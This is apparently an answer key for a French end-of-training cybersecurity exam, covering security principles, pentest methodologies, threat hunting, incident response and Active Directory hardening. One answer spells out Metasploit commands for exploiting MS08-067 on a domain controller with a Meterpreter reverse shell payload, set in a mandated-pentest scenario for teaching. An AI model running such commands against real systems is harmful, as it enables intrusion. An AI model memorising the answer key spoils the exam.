Académique Documents
Professionnel Documents
Culture Documents
EFF ID o CS V1 Correction
EFF ID o CS V1 Correction
Eléments de correction
Secteur : Digital et Intelligence Artificielle Niveau : Technicien Spécialisé
Disponibilité : Propriété d'accessibilité au moment voulu des biens par les personnes autorisées
(i.e. le bien doit être disponible durant les plages d’utilisation prévues)
Intégrité : Propriété d'exactitude et de complétude des biens et informations (i.e. une modification
illégitime d’un bien doit pouvoir être détectée et corrigée)
Confidentialité : Propriété des biens de n'être accessibles qu'aux personnes autorisées
2. Quelle est la différence entre les postures offensive et défensive ?
La posture défensive se focalise sur des mesures réactives, telles que l'application de correctifs
logiciels et la recherche et la remédiation des vulnérabilités du système tandis que La posture
offensive est une approche proactive pour protéger les systèmes informatiques, les réseaux et les
individus contre les attaques qui consiste à attaquer son propre système pour en découvrir les
points faibles et y apporter des solutions.
3. Relier chaque norme ISO à son principe :
4- 27007
d- Les bonnes pratiques
Une Politique de Sécurité des Systèmes d’Information (PSSI) reflète la vision stratégique de la
direction de l’organisme (PMI, industrie, administration) en matière de sécurité des systèmes
d'information (SSI) et de gestion de risques SSI. Elle décrit en effet les éléments stratégiques (
référentiel, principaux besoins de sécurité et menaces) et les règles de sécurité applicables à la
protection du système d'information de l'organisme.
5. Utiliser la capture suivante est définir les éléments : A, B, C et D
Black Hat Hacker : désigne un pirate informatique qui s’introduit dans un système ou un
réseau informatique avec des intentions malveillantes. Un hacker black hat peut exploiter les
failles de sécurité à des fins lucratives, pour voler ou détruire des données privées, ou pour
modifier, perturber ou fermer des sites web et des réseaux.
White Hat Hacker : est un hacker qui est légalement engagé par une organisation ou une
personne pour pirater ses infrastructures afin de trouver d'éventuelles faiblesses
Grey Hat Hacker : est un hacker ou un groupe de hackers, qui agit parfois avec éthique, et
parfois non. Ce terme est employé pour désigner ceux qui se situent entre hacker white hat et
hacker black hat
8. Donner les étapes à suivre pour réussir un programme de sensibilisation à la sécurité informatique.
Analyse - Planification – Déploiement – Mesure - Optimisation
9. Citer les deux référentiels les plus répandus utilisés pour le durcissement de la sécurité.
ANSSI - CIS
10. Vous avez reçu l’email suivant :
Quel est le piège à éviter ? Quelle sont les meilleures attitudes à adopter ? Et il s’agit de quel type
d’attaque?
Le pentester est un professionnel de la cybersécurité dont les missions visent à limiter et anticiper
au maximum les failles et intrusions malveillantes dans le système informatique de l’entreprise. Si
ses compétences sont bien un atout, ses qualités doivent suivre aussi. Les unes ne vont pas sans les
autres. Cela se traduit par être :
Ethique et légal
Curieux
Dynamique
Réactif
Créatif
Disponible
Faire preuve de confidentialité
Aimer le travail en équipe
Avoir le goût du défi
14. Remplir le tableau de comparaison entre les méthodologies de test d’intrusion (copier le tableau
dans votre feuille).
OWASP OSSTMM PTES
Filière Infrastructure Digitale Option Cybersécurité Variante V1 Page Page 4 sur 12
Examen Corrigé Fin de Formation Session Juin
Domaine d’utilisation (Industrie, Application Application Industrie Système
Web ou Système d’Information) Web d’Information
Type de test d’intrusion (Interne ou Externe) Interne/Externe Interne Interne/Externe
L'objectif du processus de gestion des incidents est de définir les activités qui doivent être prises
en compte lors de la détection, de l'analyse et de la résolution de l’incident.
17. Donner deux exemples d'incidents de sécurité.
Threat Hunting peut être défini comme stratégie proactive conçue pour trouver des menaces
inconnues ou des adversaires cachés à l'intérieur d’un réseau avant qu'ils ne puissent exécuter une
attaque ou atteindre leurs objectifs
20. Quelle est la différence entre la Chasse structurée et non structurée de Threat Hunting ?
La chasse structurée est la méthodologie la plus proactive du Threat Hunting qui permet d’utiliser
les indicateurs d'attaque (IoA) et les tactiques, techniques et procédures (TTP) pour déterminer
les acteurs de menace, alors que La chasse non structurée débute à partir d'un déclencheur ou
d'un indicateur de compromission (Ce type de Threat Hunting peut découvrir de nouveaux types
de menaces ou de menaces qui ont pénétré l'environnement dans le passé et sont maintenant en
sommeil.
21. Citer deux objectifs du plan de réponse aux incidents.
Fournir une stratégie de réponse cohérente aux menaces de sécurité de l'information qui mettent
en danger les données et les systèmes de l’entreprise .
Protéger la confidentialité, l'intégrité et la disponibilité des systèmes, réseaux et données.
Protéger le bien-être de l’entreprise et minimiser les atteintes à la réputation.
Aider l'entreprise à se rétablir après des incidents de sécurité de l'information.
Mettre en oeuvre des actions correctives opportunes et appropriées.
Répondre aux exigences légales ou réglementaires.
22. Donner deux exemples des attaques APT.
Muddy Water
Filière Infrastructure Digitale Option Cybersécurité Variante V1 Page Page 5 sur 12
Examen Corrigé Fin de Formation Session Juin
Cozy Bear
Fancy Bear
Stuxnet….
L'investigation numérique, ou digital forensic, consiste à utiliser des techniques spécialisées dans
la recherche, la collecte et l'analyse de données issues de supports numériques.
Le processus : Identification, Préservation, Analyse, Documentation et Présentation
24. Quel est l’objectif du durcissement d’un système d’information et citer ses 3 principes.
Le Durcissement des systèmes d’information fait partie des principes les plus importants de la
sécurité des SI. À mesure que les SI évoluent, le durcissement doit être ajusté pour suivre
l’évolution de la technologie du système d’exploitation. Le durcissement consiste à réduire la
surface d’attaque disponible pour l’attaque.
3 principes : zéro trust, sécurité en profondeur, moindre privilège
25. Citer les étapes pour mettre en œuvre un programme DLP.
Dossier 3 :
Partie 1 :
Vous serez dans le rôle d’un pentester de sécurité informatique. Vous êtes mandaté par la société XYZ
pour tester la sécurité de son système d’information interne Active Directory.
Active Directory est une solution de Microsoft qui permet de gérer des parcs informatiques d’entreprises.
Les entreprises utilisent cette solution pour gérer leurs utilisateurs, les postes de travail, les serveurs, etc.
Dans cette démarche, vous vous mettrez à la place d’un administrateur d’entreprise qui souhaite sécuriser
son environnement. Cela vous permettra d’avoir suffisamment d’informations pour être le plus exhaustif
possible dans vos recherches, et d’avoir les clés nécessaires pour sécuriser et surveiller votre
environnement.
Ton objectif en tant que pentester est d’identifier les serveurs et postes potentiellement vulnérables qui
pourront par la suite être utilisés comme point d’entrée par un attaquant.
La topologie du réseau :
34. En utilisant la capture précédente, écrire la suite des commandes pour utiliser ce module sur la
machine cible Windows 2003 server (contrôleur de domaine AD)
Use 0 ou use exploit/windows/smb/ms08_067_netapi
[Info]
[Options]
Filière Infrastructure Digitale Option Cybersécurité Variante V1 Page Page 9 sur 12
Examen Corrigé Fin de Formation Session Juin
set RHOSTS 192.168.1.5
[use payload windows/meterpreter/reverse_tcp]
Exploit
35. Quels sont les éléments que vous devez inclure au rapport de test d’intrusion ?
Le sommaire exécutif
Les détails techniques des vulnérabilités identifiées
L’impact potentiel des vulnérabilités et le niveau de risque associé
Les solutions concrètes permettant de corriger les vulnérabilités
Les méthodologies utilisées dans le test
Partie 2 :
Selon le Rapport d'évaluation de la configuration de la sécurité du PC WINDOWS 10 réalisé par l’outil CIS-
CAT, voilà un extrait de rapport :.
37. Proposer une politique stricte de mot de passe et de verrouillage du compte en se basant sur les
paramètres de stratégie de groupe.
Partie 3 :
Avec les connaissances de techniques d’attaque requises pendant le test d’intrusion, vous aurez tous pour
améliorer le niveau de sécurité de votre Active Directory et le surveiller. Votre client vous demande de
réaliser un guide de durcissement afin de fournir des recommandations et des procédures permettant la
sécurisation d’un annuaire Active Directory.
38. Le durcissement de l’Active Directory consiste principalement à réduire à l'indispensable les objets
installés sur le système et la surface d’attaque disponible. Citer trois recommandations pour renforcer
la sécurité de l’Active Directory.
L’implémentation de moindres privilèges comme modèle d’administration
L’implémentation d’hôtes d’administration sécurisés
Gérer les groupes de sécurité Active Directory
Nettoyer les comptes d'utilisateurs inactifs dans AD
Surveiller les administrateurs locaux
Une politique de mot de passe stricte
Activer la surveillance de la sécurité d'Active Directory pour les signes de compromis…..
39. En plus d’améliorer le niveau de sécurité global du système d’information, il est crucial de
savoir surveiller le système pour maintenir le niveau de sécurité le plus élevé possible. Citer deux
outils ou méthodes pour surveiller les événements de votre environnement Active Directory.
Syslog – Sysmon – PingCastle - EventLog Analyzer….
Dossier 4 :
Après le téléchargement d’une pièce jointe à partir d’un email personnel, un collaborateur de l'entreprise
ABC remarque que ses fichiers sont inaccessibles, ont une extension étrange telle que HLjkNskOq ou
19MqZqZ0s et un message s’affiche, ressemblant à l'image suivante :
44. Qu’est-ce qu’une réponse automatisée aux incidents et quelle est son importance dans ce cas ?
La gestion automatisée des incidents est le processus d'automatisation de la réponse aux incidents
pour garantir que les incidents critiques sont détectés et traités de la manière la plus efficace et la
plus cohérente.
L'avantage fondamental L'automatisation accélère les réponses et les tâches de routine réduisant
considérablement le temps de réponse face à une cyber menace. Cela peut faire toute la différence
lorsqu'il s'agit de réduire l'impact d'une attaque sur un système.
L’automatisation fonctionne comme un accélérateur pour atteindre l'objectif de répondre
intelligemment en un temps record